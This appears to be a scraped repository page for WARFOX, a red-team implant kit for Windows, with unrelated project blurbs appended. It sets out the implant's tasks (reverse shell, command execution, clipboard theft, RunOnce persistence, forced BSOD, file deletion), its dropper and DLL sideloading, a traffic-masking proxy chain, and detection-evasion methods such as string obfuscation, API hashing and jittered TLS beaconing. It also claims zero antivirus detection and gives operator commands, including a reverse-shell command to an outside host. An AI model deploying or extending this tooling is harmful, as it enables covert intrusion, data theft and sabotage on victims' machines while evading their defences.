An HTTPS beaconing Windows implant and multi-layered proxy C2 network designed for covert APT emulation focused offensive operations

Overview

WarFox

WARFOX is a software-based HTTPS beaconing Windows implant that uses a multi-layered proxy network for C2 communications. This kit was designed to emulate covert APT offensive operations. This kit includes WARFOX (Windows implant), HIGHTOWER (Listening Post), and other tools to build configs and set up a proxy network.


Included Tools and Scripts

  • WARFOX: A software implant written in C++ designed to target Windows systems to aid in the post-exploitation phase of an offensive operation. This implant provides the operator with 12 features in the form of tasks.
  • CUBDROP: A C# dropper and DLL-sideloading utility, WARFOX and a legitimate executable are stored as an embedded, compressed, and encrypted resource
  • HIGHTOWER: A Python HTTP server that manages and provides tasks to hosts implanted with WARFOX, network communications are encrypted using a self-signed TLS certificate.
  • LIGHTBEAM: A TCP traffic redirector that can be used to mask traffic between WARFOX and HIGHTOWER. This redirector can be daisy-chained to form a multi-level proxy network for WARFOX
  • FILEGUARD: A file compressor and crypter, FILEGUARD uses GZIP and AES-128 (CBC) to obfuscate and pack files
  • edit_timestamp.py: Edit the PE timestamp to include a random date going back in time 90 days
  • build_config.py: Generate AES encrypted configuration data for your IP:PORT pair

Network Architecture and Design

LIGHTBEAM TCP traffic redirectors can be daisy-chained together to form a multi-layered proxy node network to mask traffic between a host running WARFOX and HIGHTOWER. LIGHTBEAM relies on socat for traffic redirection, the tool can be run on Linux hosts.

  • Traffic between WARFOX hosts and HIGHTOWER is encrypted using self-signed certificates
  • WARFOX hosts periodically beacon over HTTPS to HIGHTOWERs HTTP server
  • When an operator issues a new task for a WARFOX host, the task command is included in the HTTP response packet, this is processed by WARFOX's tasking/processing engine

HIGHTOWER relies on two designated HTTPS endpoints to process beaconing check-ins and task command results

  • Endpoint #1 (/update) receives inbound beacon requests from WARFOX hosts, host sessions are determined by the id field of the beaconing packet.
  • Endpoint #2 (/finish) receives the results of issued task commands, this information is displayed to the operator that issued the task

Secure Communications

To avoid network detection, WARFOX beaconing and tasking responses were designed to evade common network detection techniques.

  • Beaconing intervals are randomized using jitter to avoid easy-to-spot patterns. This is implemented using a sleep function call with a random value between network requests
  • Network traffic is encrypted using TLS to avoid the ability to write Snort or Suricata rules for traffic patterns. Additionally, the self-generated certificates use null values to avoid being easily detected or blacklisted based on their information

WARFOX

  • Beaconing Engine:

    • The beaconing engine is responsible for preparing periodic beaconing check-in requests with HIGHTOWER. The implant periodically checks-in with HIGHTOWER via beacon requests that include information related to the infected system. Outbound beacon requests include the systems hostname, current users’ username, system architecture, and more. The information for beacon requests is packaged into a JSON object, encoded via BASE64, and sent to the /update HIGHTOWER endpoint.
  • Tasking Engine:

    • When an operator issues a new task for the implant, the command is set as the default HTTP response, when the implant identifies that a new task was issued, it's parsed via the Tasking Engine to determine what functionality to execute. When a task is received, the corresponding function (get_processes for example) is executed and the task result is packaged into a task_response JSON object which is exfiltrated to the /finish HIGHTOWER endpoint.
  • Networking Engine:

    • Beacon check-ins and task responses use the Networking Engine to send HTTPS requests to HIGHTOWER via the Windows WinInet API library. Before sending a request, HTTPs is enabled for requests.
  • Protected Configuration:

    • The embedded HIGHTOWER IP address and port are encrypted within the implant configuration. When required, the configuration data is decrypted via AES-128 in CBC mode. New configurations can be created using the build_config.py script located in the /scripts directory.

Supported Tasks

The WARFOX implant supports 12 operator-provided tasks. The following table provides an overview of the task categories. Tasks in the Interaction category require an additional argument to carry out the relevant operation, consult the usage section for examples.

Task Command Description Category
get_processes List the running processes using NtQuerySystemInformation Information Gathering
get_drivers List the running drivers using NtQuerySystemInformation Information Gathering
get_users List information about the users on the system Information Gathering
get_clipboard Get a copy of clipboard contents Information Gathering
find_files Locate files by a specific extension in a directory Interaction
del_file Delete a file Interaction
kill_pid Kill a process by its PID Interaction
rev_shell Spawn an interactive shell Interaction
exec_command Execute a system command Execution
bsod BSOD the system Other
reg_persist Persist via the Registry using the RunOnce key Other
uninstall Uninstall and remove traces of artifacts on the remote system Other

Evasion Mechanisms

  • Sensitive strings are obfuscated using a compile-time based XOR obfuscation libary
  • The embedded IP:PORT configuration is encrypted using AES
  • API function calls are obfuscated using API hashing via the SuperFastHash algorithm
  • (Recommended) The binary is compiled using LLVM-Obfuscator

Dependencies

WARFOX relies on a few third-party libraries which makes WARFOX susceptible of being detected based on known code patterns or signatures. While these libraries made development easier, a future goal is to implement everything from scratch.

Antivirus Detection

Currently, the compiled WARFOX implant is undetected by all AntiVirus products according to VirusTotal

image

HIGHTOWER

Overview

HIGHTOWER is a Python based HTTP server that supports WARFOX infections, HIGHTOWER relies on the http.server Python module. HIGHTOWER is unique in the fact that it mimics a legitimate IIS webserver.

Usage Guide

You can use the !help terminal command to display the help menu which provides an overview of how to configure the server for the first time, and what tasks you can issue to WARFOX.

You can use the !settings terminal command to display the current server settings. You are required to set a listening port with !listen before issuing tasks.

The !listen server command takes a port to listen on, after executing this command, the SRVPORT setting is populated

After you set a listening port, you can issue new tasks to hosts that beacon to HIGHTOWER using the !issue command. Certain tasks such as rev_shell require additional data, you can find a list of which commands require data in the technical documentation PDF

New certificates for enabling SSL/HTTPS can be generated using OpenSSL

openssl req -new -x509 -keyout localhost.pem -out localhost.pem -days 365 -nodes

Interaction Command Examples

  • issue find_files c:\users\maxim\documents\*
  • issue del_file c:\users\maxim\documents\test.docx
  • !issue kill_pid 5597
  • !issue find_exec_command calc.exe
  • !issue rev_shell 192.168.55.103:4443

LIGHTBEAM

LIGHTBEAM is a Bash based TCP traffic redirector that can be used to mask traffic between WARFOX and HIGHTOWER.

To configure LIGHTBEAM you need to set the following variables:

  1. LOCAL_LISTENING_PORT is the local port that recieves inbound TCP traffic from WARFOX
  2. C2_SERVER_IP is the IP address of the remote server to redirect traffic to
  3. C2_SERVER_PORT is the port that the layer2 remote server is listening on

FILEGUARD

PEGUARD has a dedicated Github repository here. This utility compresses files with ZLIB and encrypts them with AES-128 in CBC mode, the AES key is randomly generated and appended to the packed file.

Technical Details

FILEGUARD takes a file as input, compresses it via GZIP, encrypts it using AES-128 (CBC mode) and appends the AES key to the end of the file. This utility was designed to pack the WARFOX DLL implant to aid in its DLL sideloading execution process.

  1. You provide an input file (technically any file type should work) as argv[1] and the expected output file as argv[2]
  2. FileGuard compresses the input file using GZIP and writes a copy to disk
  3. FileGuard encrypts the compressed file using AES-128 in CBC mode with a randomly generated key
    • The AES IV is hardcoded as ffffffffffffffff to make the key parsing process of the dropper utility easier, but it could be randomized
  4. The AES key is appended to the file so it can be discovered by the dropper utility
  5. A copy of the finalized binary is stored in an output text file; the binary is formatted as a BYTE array which can be embedded in the dropper process
You might also like...
an easy implementation of a multi-process tcp server and a multi-thread tcp client
an easy implementation of a multi-process tcp server and a multi-thread tcp client

一个TCP多进程服务器-多线程客户端的简单实现。 客户端类似Apache ab的测试功能,能够通过向某一个ip端口发送指定并发量和总数量的tcp短连接;服务端处理tcp短连接,每来一条消息就打印一条log。 使用cmake编译,建议在vscode里编译,或者命令行 # 终端进入目录 mkdir bu

Pushpin is a reverse proxy server written in C++ that makes it easy to implement WebSocket, HTTP streaming, and HTTP long-polling services.
Pushpin is a reverse proxy server written in C++ that makes it easy to implement WebSocket, HTTP streaming, and HTTP long-polling services.

Pushpin is a reverse proxy server written in C++ that makes it easy to implement WebSocket, HTTP streaming, and HTTP long-polling services. The project is unique among realtime push solutions in that it is designed to address the needs of API creators. Pushpin is transparent to clients and integrates easily into an API stack.

reverse proxy with web server and preview page

Reverse Proxy Dependencies Go Make Suport Termux (android/afsd kernel) linux (kernel) Install: Termux: 1 step: Install Go-lang, Git and Make pkg insta

Proxy that can be used in GTPS to crash and others. All commands are already in

Credit to ama6nen Real Repo This proxy can be used and modified by everyone. This proxy already has several command exploits for gtps Features: /proxy

We use Clash as the backend proxy, which supports Shadowsocks(R), V2Ray, and Trojan protocols.
We use Clash as the backend proxy, which supports Shadowsocks(R), V2Ray, and Trojan protocols.

We use Clash as the backend proxy, which supports Shadowsocks(R), V2Ray, and Trojan protocols.

aria2 is a lightweight multi-protocol & multi-source, cross platform download utility operated in command-line.

aria2 is a lightweight multi-protocol & multi-source, cross platform download utility operated in command-line. It supports HTTP/HTTPS, FTP, SFTP, BitTorrent and Metalink.

Pipy is a tiny, high performance, highly stable, programmable proxy written in C++

Pipy is a tiny, high performance, highly stable, programmable proxy. Written in C++, built on top of Asio asynchronous I/O library, Pipy is extremely lightweight and fast, making it one of the best choices for service mesh sidecars.

zrp is a nat-passthrough reverse proxy written in modern c++.

zrp is a nat-passthrough reverse proxy written in modern c++. A major use case is to expose a local server via a remote server with public IP.

A Nginx module which tries to implement proxy wasm ABI in Nginx.

Status This library is under construction. Description A Nginx module which tries to implement proxy wasm ABI in Nginx. Install dependencies Download

Comments
  • Timestomp python script does not work

    Timestomp python script does not work

    Hi,

    I was trying out the edit_timestamp.py script but it does not change the date on an EXE file for me. I checked the date with CFF explorer but it didn't change. Any ideas what may be wrong?

    opened by carlnykvist 1
Owner
Malware Researcher/Adversary Simulation/Reverse Engineer/Exploit Developer
null
A lightweight Universal Windows proxy app based on https://github.com/eycorsican/leaf

Maple A lightweight Universal Windows proxy app based on https://github.com/eycorsican/leaf Features Configuration management Outbound network adapter

YtFlow 670 Sep 22, 2022
XMap is a fast network scanner designed for performing Internet-wide IPv6 & IPv4 network research scanning.

XMap is reimplemented and improved thoroughly from ZMap and is fully compatible with ZMap, armed with the "5 minutes" probing speed and novel scanning techniques. XMap is capable of scanning the 32-bits address space in under 45 minutes.

idealeer 181 Sep 15, 2022
Header-only C++14 library for getting network addresses associated with network interface without name lookups on Windows, macOS, Linux, and FreeBSD

NetIF Get addresses associated with network interfaces on a system without using name lookups. Header-only, requires C++14. Usage Add the header file

GMLC-TDC 9 Aug 2, 2022
Netif - Header-only C++14 library for getting network addresses associated with network interface without name lookups on Windows, macOS, Linux, and FreeBSD

NetIF Get addresses associated with network interfaces on a system without using name lookups. Header-only, requires C++14. Usage Add the header file

GMLC-TDC 9 Aug 2, 2022
BingBing 58 Sep 17, 2022
A software C library designed to extract data attributes from network packets, server logs, and from structured events in general, in order to make them available for analysis

MMT-DPI A software C library desinged to extract data attributes from network packets, server logs, and from structured events in general, in odrder t

Montimage 3 Apr 14, 2022
A modern C++ network library for developing high performance network services in TCP/UDP/HTTP protocols.

evpp Introduction 中文说明 evpp is a modern C++ network library for developing high performance network services using TCP/UDP/HTTP protocols. evpp provid

Qihoo 360 3.1k Sep 22, 2022
Event-driven network library for multi-threaded Linux server in C++11

Muduo is a multithreaded C++ network library based on the reactor pattern. http://github.com/chenshuo/muduo Copyright (c) 2010, Shuo Chen. All righ

Shuo Chen 12k Sep 26, 2022
Phorklift is an HTTP server and proxy daemon, with clear, powerful and dynamic configuration.

Phorklift is an HTTP server and proxy daemon, with clear, powerful and dynamic configuration.

null 43 Mar 1, 2022